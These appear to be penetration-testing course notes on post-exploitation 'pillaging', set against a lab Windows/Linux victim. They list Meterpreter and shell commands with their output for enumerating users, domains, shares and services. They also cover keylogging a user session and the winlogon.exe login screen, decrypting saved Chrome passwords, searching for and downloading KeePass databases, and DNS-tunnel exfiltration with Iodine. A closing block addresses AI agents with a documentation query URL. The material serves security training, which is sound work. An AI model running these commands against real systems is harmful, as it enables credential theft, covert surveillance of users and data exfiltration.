# Pillaging / Data Harvesting ### 6.3. Pillaging / Data Harvesting Once we have built our way into the victim machine, we can move on to the next phase: Data Harvesting / Pillaging. Pillaging is the step in which you access sensitive data and intellectual property of the target organization. Demonstrating the feasibility of an external hacker accessing this information might be the goal of the overall engagement, so this phase is critical. However, according to the type of machine you have compromised, you may or may not find what you are looking for. This presents the need to further exploit and infiltrate the network. Therefore in this step we will also harvest data and information necessary for this purpose. This encompasses getting local information such as files, enumerating credentials, accounts, IM logs, and more, but also network information such as internal network blocks in use, domains, intranet servers, shared hard drives, printers, repositories, and so on. Network information will also be used in the Mapping the internal network phase. **Important** Since there is an infinite list of commands that we can run on the target machines, we will not list all of them here. Instead, we will see the most important and then we will give you some references at the end of this section. The important thing to remember here is that we need to get as much \[information]\[] as we can: system info, applications, services, networks, documents, messaging, and so on. In the next sections we will see a list of scripts and commands related to data harvesting, that a penetration testers could use through a meterpreter session or shell. Notice that we have already seen some of these scripts in previous phases, but for different purposes. We will still mention them here since they are very important for the success of this step. Let us start harvesting basic information about the system. * `sysinfo` With `sysinfo` command we are able to get basic information about the remote system. Notice that the script works both on Windows and Linux OS. ``` meterpreter > sysinfo Computer : ELS OS : Windows 7 (Build 7601, Service Pack 1) Architecture : x64 (Current Process is WOW64) System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/win32 ``` * `getuid` With `getuid`, we can check the user that we are running as on the target machine. ``` meterpreter > getuid Server username: uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000 ``` ``` meterpreter > getuid Server username: els\els ``` Starting from this information, we can already start making assumption about the role of the victim machine. For example, if the previous command show us that the victim machine is a server, one of the most important things to check is which services are running on it. In other words, we have to figure out the role of the machine in the remote network. You should try to get answers to questions like: * Is this a workstation? * Which department is it from? * R\&D? * Marketing? * ... * Is this a server? * What server? * Mail server? * Web server? * RADIUS? * ... During the *Pillaging* step, we should be able to give an accurate answer to those questions according to the information we get on the system. Let us start uncovering some of the commands we can run to collect more information. Metasploit already implements some enumeration scripts that could be used for this purpose: - `run /post/windows/gather/` Result: `meterpreter > run post/windows/gather/ Display all 106 possibilites? (y or n) run post/windows/gather/arp_scanner run post/windows/gather/bitcoin_jacker run post/windows/gather/cachedump run post/windows/gather/checkvm` - `run /post/linux/gather/` Result: `run post/windows/gather/arp_scanner run post/windows/gather/bitcoin_jacker run post/windows/gather/cachedump run post/windows/gather/checkvm` ``` Notice that the previous scripts contain predefined sets of shell commands that will be run on the target machine in order to get the correct information. (see img-195?) ``` Although they are very useful and will save us a lot of time, we can use Windows or Unix commands from an interactive shell in order to get the same results. For example, let us first run the `enum_services` scripts and then check how we can get similar results from a shell. \`\`\` \[\*] Listing Services Info for matching services, please wait... \[+] New service credentials detected: AeLookupSvc is running as \`\` \[+] New service credentials detected: ALG is running as 'NT AUTHORITY\LocalService' \[+] New service credentials detected: aspnet\_state is running as 'NT AUTHORITY\NetworkService' Services ======== ```` Name Credentials Command Startup ---- ----------- ------- ------- ALD NT AUTHORITY\LocalService Manual C:\Windows\System32\alg.exe AeLookupSvc localSystem Manual C:\Windows\System32\svchost.exe ApoIDSvc NT Authority\LocalService Manual C:\Windows\System32\svchost.exe ``` As you can see, with a single command we het a list of all services on the remote machine, the user associated with each of them, the startup type, and also the path to the binary. The same information can be obtained on the machine, by opening the *Services* configuration windows (see img-197). ```` **Important** It is important to know that many post exploitation scripts are implemented as modules and can be used outside the meterpreter session. ```` We just need to select the module with the `use` command, configure its options with `set`, and then execute the module with `run`. Let us see an example based on `enum_services`. We will get the same results obtained before, but we can also configure the module according to our needs. ``` msf > use/post/windows/gather/enum_services msf post(enum_services) > show options Name Current Setting Required Description ---- --------------- -------- ----------- CRED no String to search credentials for PATH no String to search path for SESSION 2 yes The session to run this module on TYPE All yes Service startup Option (Accepted: All, Auto, Manual, Disabled) msf post(enum_services) > run ``` ```` As we said before, post exploitation scripts and modules usually contain and execute a well-defined set of OS commands. In other words, we can get similar information by running the correct commands from a shell terminal on the target machine. * `wmic` In the previous case we can get services information with the `wmic` command. As we can see we get similar information. Example: ``` C:\Users\els\Downloads>wmic service get Caption,StartName,State,pathName wmic service get Caption,StartName,State,pathname Caption StartName State PathName Application Experience localSystem Running C:\Windows\system32\svchost.exe -k netsvcs Application Layer Gateway Service NT AUTHORITY\LocalService Stopped C:\Windows\system32\alg.exe Application Identity NT Authority\LocalService Stopped C:\Windows\system32\svchost.exe -k LocalServcieAndNoImpersonation ``` * `net start` Another useful command that we can use to list services that are currently running is `net start`. Inspecting the results of these commands gives us a better idea of the machine role. Inspecting the results of these commands gives us a better idea of the machine role. For example, services like `DNS` or `IIS` tell us that the exploited machine have a server role. ``` C:\Windows\system32> net start net start These Windows services are started: Application Experience Application Information Background Intelligent Transfer Service Base Filtering Service ... Remote Desktop Configuration Remote Desktop Services Remote Desktop Services UserMode Port Redirector ``` * `service --status-all` As you can imagine, these commands rely on the OS we are dealing with. For example if we want a list of services running on the exploited Linux machine, we will run `service --status-all` Example: ``` meterpreter > shell Process 9852 created. Channel 1 created. $ service --status-all [+] acpid [-] anacron [+] apache ``` * `ps` In addition to services running on the machine, listing running process could also be very useful to understand the role of the machine. The easiest way to check them is by running the `ps` command on the meterpreter. Some critical information to retrieve in a Windows networked environment, is if the compromised machine is part of a domain, or even, if it is a domain controller. * `net view/domain` To gather this information we can run the command `net view/domain` or run the script named `enum_domains`. Here is an example of what we may get. In this case the machine is in the domain `ELSLAB` and we also know the name of the Domain Controller. ``` C:\Users\els\Downloads>net view /domain net view /domain Domain ----------------------------------------------------------------------------- ELSLAB The command completed successfully. C:\Users\els\Downloads>^C Terminate channel 2? [y/N] y meterpreter > run post/windows/gather/enum_domains [*] Enumerating DCs for ELSLAB [+] Domain Controller: WIN-2QH87UNDLTR ``` * `net group "Domain Controllers" /domain` We can also print the list of Domain Controllers with the following command: ``` C:\Windows\system32>net group "Domain Controllers" /domain net group "Domain Controllers" /domain Group name Domain Controllers Members Comment All domain controllers in the domain ---------------------------------------------------------------------------- WIN-2QH87UNDLTR$ The command completed successfully. ``` Let us now focus on which command we can use to get information about users. * `net user` (Windows) and `cat /etc/passwd` (Linux) With these commands we are able to list users on the system. ``` C:\Windows\system32>net user net user User accounts for \\ ----------------------------------------------------------------------------- Administrator els els_user EveUser Guest stduser user The command completed with one or more errors. ``` ``` # cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/sbin/nologin ``` * `run post/windows/gather/enum_ad_users` Notice that since the Windows machine is part of a domain, we can also use meterpreter scripts to enumerate accounts and other information in the default active domain: ``` meterpreter > run post/windows/gather/enum_ad_users Domain Users ============ sAMAccountName name userPrincipalName userAccountControl lockoutTime mail primarygroupid -------------- ---- ----------------- ------------------ ----------- ---- -------------- Administrator Administrator 512 513 Guest Guest 66082 514 ``` * `net user /domain` Similar information can be obtained with the `net user /domain` command. Remember that most of the scripts automate and organize information that can be gathered with shell commands. ``` C:\Windows\system32>net user /domain net user /domain The request will be processed at a domain controller for domain eLSLab.local. User accounts for \\WIN-2QH87UNDLTR.eLSLab.local ---------------------------------------------------------------------------- Administrator Francesco Guest krbgt The command completed with one or more errors. ``` * `net localgroup` Moreover we can check which groups exist on the machine or which users are within a group with the `net localgroup [group_name]` command. ``` C:\Usrs\els\Downloads>net localgroup net localgroup Aliases for \\ELS ---------------------------------------------------------------------------- *Administrators *Backup Operators *Cryptographic Operators *Distributed COM Users ``` ``` C:\Usrs\els\Downloads>net localgroup Administrators net localgroup Administrators Alias name Administrators Comment Administrators have completed and unresticted Members ---------------------------------------------------------------------------- *Administrators *Backup Operators *Cryptographic Operators *Distributed COM Users ``` * `net share` and `enum_shares` The last command we will see is useful to display all the resources shared on the victim. We can use `net share` from the command prompt or `enum_share` from meterpreter. ``` C:\Users\els\Downloads>net share net share Share name Resource Remark ---------- -------- ------ C$ C:\ Default share IPC$ Remote IPC ADMIN$ C:\Windows Remote Admin test C:\Users\els\Documents\test Users C:\Users The command completed successfully ``` ``` meterpreter > run enum_shares [*] [*] The following shares were found: [*] Name: test [*] Path: C:\Users\els\Documents\test [*] Type: 0 [*] [*] Name: Users [*] Path: C:\Users [*] Type:0 [*] [*] Recent UNC paths entered in Run Dialog found: [*] \\192.168.102.147\1 ``` The list of commands in this section is just a small fraction of the ones that are available in Meterpreter or in the OS shells. For example we did not yet gather networking information such as IP addresses, ARP tables, DNS, current connections, and so on. In addition to this information, we also still need to check installed applications and local files. as you have already seen, you have a number of different commands and methods to retrieve information, depending on the victim OS. Showing all of them is merely impossible, but fellow pentesters have shared a few documents with us **listing all potential** commands for: * \[Windows]\[] * \[Linux]\[] * \[OSX]\[] * \[Metasploit]\[]. At the following \[link]\[] you can find a few more links containing post-exploitation commands. You can also download them locally and access it from a web browser. Notice that there are many other lists available online. \[Here]\[] and \[Here]\[] you can find a few more commands to run on Windows and Linux/Unix/BSD machine. We strongly suggest you take a look at these documents in order to understand what type of commands and information you may need to gather from exploited machines. Before seeing how to harvest files from the victim, it is useful to know that Metasploit implements scripts that automatically retrieve information from the system. The two main scripts that we can use against Windows machines are * `scraper`\ harvests system info including network shares, registry hives, and password hashes * `winenum`\ retrieves all kinds of information about the system including environment variables, network interfaces routing, user accounts, and much more. If we inspect the code of these 2 scripts, we can see the list of commands that they will run on the remote machine (see img-218) Notice that they will automatically save all information gathered into local files, so we can inspect them later. `meterpreter > run winenum [*] Running Windows Local Enumeration Meterpreter Script [*] New session on 192.168.102.157:47451... [*] Saving general report to /root/.msf5/logs/scripts/winenum/ELS_20160303.5433/ELS_20160303.5433.txt [*] Checking if ELS is a Virtual Machine ........ [*] This is a VMware Workstation/Fusion Virtual Machine [*] UAC is Disabled [*] Running Command List ... [*] running command arp -a [*] running command cmd.exe /c set [*] running command ipconfig /all` Once we have information about the system, networks, users, groups, services, and so on, we can start getting not only actual files and documents, but also keystrokes. We will look for usernames, passwords, IM logs, private documents, and so on. Metasploit offers some great scripts that could be used in this step. For example with `screenshoot` command we are able to get the screen of the victim. (see img-221) Another way to get sensitive information from the target machine is by running a keylogger. Although there are many keylogger tools that we can use and install on the remote machine, Metasploit also offers a few scripts to do this: `keyscan_start` and `keylogrecorder` ``` It is important to know that depending on the privileges we have on the remote machine and the process we are attached to, different keystrokes can be logged. For example, if we want to log credentials typed when the user unlocks the screen we will have to attach the session to the `winlogon.exe` process (which runs on SYSTEM). On the other side, if we want to dump keystrokes while the user uses applications and so on, we will have to attach the process `explorer.exe` (which runs on user level). ``` Let us see how the 2 script works: * `keyscan_start`, `keystart_dump`, `winlogon.exe` The first script we are going to use is `keystart_scan`. Notice that we already migrated in `explorer.exe` ``` meterpreter > getpid Current pid: 3012 meterpreter > keyscan_start Starting the keystroke sniffer... meterpreter > ``` Once the sniffer is running we just have to wait for the user to type something on the keyboard. Notice that the keystrokes will not be automatically printed on the screen. Instead we have to run `keyscan_dump` to see them. ``` meterpreter > keyscan_dump Dumping captured keystrokes... bank of america elstarget MyStringPwd23454_ ``` As we can see, it seems the user typed `bank of america` and then some credentials. While the sniffer is running, we can dump the keystrokes by simply executing `keyscan_dump`. To stop the sniffer we just need to run `keyscan_stop` Let's now migrate to `winlogon.exe` and try to dump the user login credentials. ``` PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 500 412 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\syst meterpreter > getpid Current pid: 500 meterpreter > keyscan_start Starting the keystroke sniffer... meterpreter > keyscan_dump Dumping captured keystrokes... meterpreter > keyscan_dump Dumping captured keystrokes... meterpreter > keyscan_dump Dumping captured keystrokes... els meterpreter > ``` * `keylogrecorder` The next script we want to use is `keylogrecorder`: ``` meterpreter > run keylogrecorder -h Keylogger Recorder Meterpreter Script This script will start the Meterpreter Keylogger and save all keys in a log file for later analysis. To stop capture hit Ctrl-C Usage: OPTIONS: -c Type of key capture. (0) for user key presses, (1) for winlogon credential capture, or (2) for no migration. Default is 2. -h Help menu -k Kill old Process -l Lock screen when capturing Winlogon credentials -t Time interval in seconds between recollection of keystrokes, default 30 seconds ``` As we can see, with the `-c` option we can instruct the script which type of key to capture (user or `winlogon`) Different form previous script, `keylogrecorder` automatically migrates to the correct process, but it also stores all the keystrokes into a local file. ``` meterpreter > run keylogrecorder -c 0 [*] explorer.exe Process found, migrating into 3012 [*] Migration Successful!! [*] Starting the keystroke sniffer... [*] Keystrokes being saved in to /root/.msf5/logs/scripts/keylogrecorder/192.168.102.157_20160303.4055.txt [*] Recording ``` In order to see the keystrokes we just need to open the file stored in the Metasploit logs folder. Now let's see a few commands that allows us to list files, create files, folders, move between directories, and so on. From the meterpreter help manual we can see the list of commands that are implemented. \`\`\` Stdapi: File system Commands ============================ ```` Command Description ------- ----------- cat Read the contents of a file to the screen cd Change directory download Download a file or directory edit Edit a file getlwd Print local working directory getwd Print working directory ... ``` ```` It does not matter the OS of the exploited machine. These commands work the same way. For example, with the commands `pwd` and `getwd` we are able to get the working directory and then we could list files. ``` Thanks to these commands (`search`, `download`, etc) we are able to search and download files like Web Browser cache, IM logs, documents, email files, PGP keys, specific program files like KeePass databases, and so on. ``` Let's suppose we want to search for a specific file extension such as KeePass database file. We can do this with the following command: `search -d C:\\Users\\els\\ -f *.kdbx` Description: - `-d` is the path where to begin searching from - `-f` is the file pattern to search Once we have located the file we need, we can download it to our machine with the command `download`. We can use this command to retrieve all the files we need. For example we can search for IM logs like Skype, Windows Live Messenger, software configuration files such as FTP clients, SVN clients, and so on, and then download the files locally in order to inspect them. ``` As you can imagine, the kind of files to retrieve differs from victim to victim: web browser history is a good place to look, since you can find internal corporate network information. ``` Once we have downloaded and analyzed files on the remote file system, we can move on with our investigation and start searching for credentials stored on the system. We can use Metasploit modules or use third party software (\[Nirsoft]\[] has many of these tools for windows) ```` The modules that Metasploit offers can be found in the `post/windows/gather/credentials` path: ``` meterpreter > run post/windows/gather/credentials/ run post/windows/gather/credentials/bulletproof_ftp run post/windows/gather/credentials/coreftp run post/windows/gather/credentials/credential_collector ... ``` Besides scripts stored in the credentials folder, it is always useful to give a look to the scripts stored in the parent path. - `enum_chrome` For example the `enum_chrome` script can be used tot gather credentials stored in Google Chrome. ``` meterpreter > run post/windows/gather/enum_chrome [*] Running as user 'els\els' ... [*] Extracting data for user 'els' ... ... ``` At the end of the output we can see that the script was able to decrypt the data. If we inspect the file created, we will see the plain-text credentials stored in it: ``` [*] => Google Now [*] Decrypted data saved in: /root/.msf5/loot/201603033113839_default_192.168.102.157_chrome.decrypted_412961.txt ``` |
V ``` stduser@les:~$ cat /root/.msf5/loot/201603033113839_default_192.168.102.157_chrome.decrypted_412961.txt Decrypted data ============== Name Decrypted Data Origin ---- -------------- ------ elstarget@gmail.com Vbk19jlaDry9AgfgAY https://accounts.google.com/ServiceLoginAuth ``` - `multi` Notice that other gathering scripts are available under the path `post/multi/gather` ``` meterpreter > run post/multi/gather run post/multi/gather/apple_ios_backup run post/multi/gather/check_malware run post/multi/gather/dbvis_enum run post/multi/gather/dns_bruteforce ... ``` ```` * `enum_application` As you can imagine, knowing what software is installed on the machine is important. As you already know, we can list them with the `enum_application` script: ``` meterpreter > run post/windows/gather/enum_applications [*] Enumerating applications installed on ELS Installed Applications ====================== Name Version ---- ------- Apple Software Update 2.1.3.127 Apple Software Update 2.1.3.127 GnuWin32: Grep-2.5.4 2.5.4 GnuWin32: Grep-2.5.4 2.5.4 Google Chrome 48.0.2564.116 Google Chrome 48.0.2564.116 ... ``` Instead of using meterpreter scripts, we could also use external tools. In our lab environment, we will use the [Web Browser Pass View](http://www.nirsoft.net/utils/web_browser_password.html) tool to extract credentials saved in the web browser installed on the target machine. As you can imagine the task to perform, the commands, the tools, and the paths to check, strongly depends on the OS you are pentesting. Moreover, the role of the victim machine on the remote network will suggest what to look for. (see vid-242) In the following video we will see how to use the previous commands in order to gather as much information as we can from the target machine. In our case we will gather them from an employee workstation, so we will try to get system, user, network information, installed applications, account credentials, IM logs, and so on. **6.3.1. Exfiltration over DNS with Iodine (DNS Tunnelling)** Most of the time, with real world-attacks the objective of malicious actors is not only compromise **systems for use of nefarious purposes**, but it also often their objective to **exfiltrate sensitive information**, and a lot of the time, they do so over protocols that are not typically monitored. One method that has been increasingly seen in the wild is the use of DNS for data exfiltration, also known as "[DNS Tunneling](http://beta.ivc.no/wiki/index.php/DNS_Tunneling)". This is a popular method due to the fact that many organizations are not logging or alerting on anomalous DNS traffic which makes it a go-to vector for exfiltrating data out of the target network, and over often under-monitored "channel". One tool that can be used for this purpose is known as "[Iodine](https://code.kryo.se/iodine/)". ``` Not only iodine can help with exfiltrating data from a target environment, but it can also help in penetration testing engagements that restrict access to the internet due to authenticated proxies for which we don't have credentials, or can also be used for bypassing captive portals, such as seen commonly in wireless networks. ``` In a typical scenario with DNS Tunneling, the attacker DNS tunnel client component initiates a connection to the attacker-controlled DNS tunnel server component through an organization's DNS server, and can be generalized with the diagram below (see img-248): `Attacker-----------DNS Tunnel--------------Attacker-Controlled (DNS Tunnel Client Component) (DNS Tunnel Server Component) | ^ | | ----------> FooCorp DNS Server-------------------` Once the DNS tunnel is established, the client transmits all network traffic, encoded, and in the form of DNS queries, typically as \[TXT]\[] records, through the tunnel, which is then decoded at the other end by the server component or attacker-controlled "DNS Server". ``` Information regarding exactly how this works, can be found [here](http://beta.ivc.no/wiki/index.php/DNS_Tunneling). From there, we can trivially tunnel all of our traffic through an SSH socks server, completely over DNS, bypassing firewalls or any authenticated proxies along the way. ``` Some pre-requisites for using Iodine to create a DNS tunnel for exfiltration are: 1. Control over a domain name that you own and its DNS configuration, and; 2. An IP address to act as the authoritative Name Server for your domain name for which you have SSH access to as well Since DNS Tunneling requires a client/server model, you'll want those 2 pieces in place in order to experiment with this method. In the video we'll show how we can configure a DNS tunneling implementation with Iodine using a domain name we have registered with GoDaddy, in addition to using IP address hosted on a VPS provider to act our exfiltration tunnel endpoint. (see vid-253) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://zer0verflow.gitbook.io/ecpptv2-notes/2-network-security/post-exploitation/pillaging-data-harvesting.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.